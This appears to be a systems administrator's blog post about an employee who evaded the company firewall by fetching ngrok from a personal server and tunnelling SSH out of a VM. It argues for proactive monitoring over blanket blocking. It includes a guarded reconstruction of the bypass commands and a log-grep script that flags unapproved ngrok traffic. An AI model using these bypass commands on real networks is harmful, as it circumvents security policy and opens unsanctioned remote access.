Firewalls are designed with the best intentions in mind, but they come with their faults. As a systems administrator, I routinely have to deal with users evading the firewall with SSH tunnels. Some do this unknowingly, by running an application, against company policy, whose embedded malware tries to evade detection.

Today was different, however. A clever developer wanted to expose SSH directly into their virtual machine and couldn’t forward it easily with tunnels, so they uploaded ngrok to their own external server and wget it from there onto the VM. This circumvented our policies entirely in one swift blow. We noticed some unusual traffic headed out to ngrok from unauthorized origins (we have some legitimate tools that use it, after approval) and quickly traced it back to its source.
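For the curious, the bypass boils down to just a few commands. This is a reconstruction after the fact, not the developer's actual session: the hostname is hypothetical, and the sketch is guarded so it stays inert unless explicitly enabled.

```shell
# Reconstruction of the bypass (hostname is made up; ngrok's standard
# TCP-tunnel syntax is assumed). Inert unless explicitly enabled.
if [ "${RUN_BYPASS_DEMO:-no}" = "yes" ]; then
  # Fetch ngrok from a personal, unclassified host, so no rule keyed
  # to ngrok's own download domains ever fires:
  wget http://personal-box.example.com/ngrok
  chmod +x ngrok
  # Expose the VM's sshd through an outbound TCP tunnel, which most
  # egress policies happily allow:
  ./ngrok tcp 22
else
  echo "bypass demo disabled"
fi
```

The point is how little of this touches anything a domain- or signature-based rule would flag: one outbound HTTP fetch from an unknown host, then ordinary-looking outbound traffic from the tunnel agent.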

This raised another issue with firewalls – we obviously don’t want to nullroute the entire world, but we do want to keep the internal network safe. We’ve done a lot in terms of blocking intrusive services, but it’s never bulletproof. Should we be blocking the entire world and whitelisting only what we know is generally considered safe?

No, we shouldn’t.

By blocking the entire world, we’re causing more problems than we solve: long delays, missing content, and some legitimate sites that no longer render at all. IPs are moving targets – IPv4 is almost entirely exhausted, IPv6 is taking over, and there are too many targets to block. Proactive monitoring let us nip this in the bud very quickly; without it, we would never have known.

Pro Tip: Always proactively monitor your firewall and the machines on your network.
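To make that tip concrete, here is a minimal sketch of the kind of check our monitoring performs. The log format, the ngrok hostname pattern, and the approved-host list are all assumptions for illustration, not our real tooling.

```shell
# Stand-in for a firewall log export of "src dst" pairs; in practice
# this would come from ss -tn, NetFlow, or proxy logs.
cat > outbound.log <<'EOF'
10.0.1.15 3.tcp.ngrok.io
10.0.2.99 3.tcp.ngrok.io
10.0.3.50 updates.example.com
EOF

# Hosts cleared to use ngrok after approval (assumed list).
approved="10.0.1.15 10.0.1.16"

: > alerts.txt
# Flag ngrok traffic from any host NOT on the approved list.
grep 'ngrok' outbound.log | while read -r src dst; do
  case " $approved " in
    *" $src "*) ;;                                  # approved origin, ignore
    *) echo "ALERT: $src -> $dst" >> alerts.txt ;;  # unapproved, flag it
  esac
done
cat alerts.txt
```

A cron job running something like this against fresh log exports is crude, but it is exactly the kind of cheap, proactive check that caught today's incident: the traffic itself looked legitimate, and only the unapproved origin gave it away.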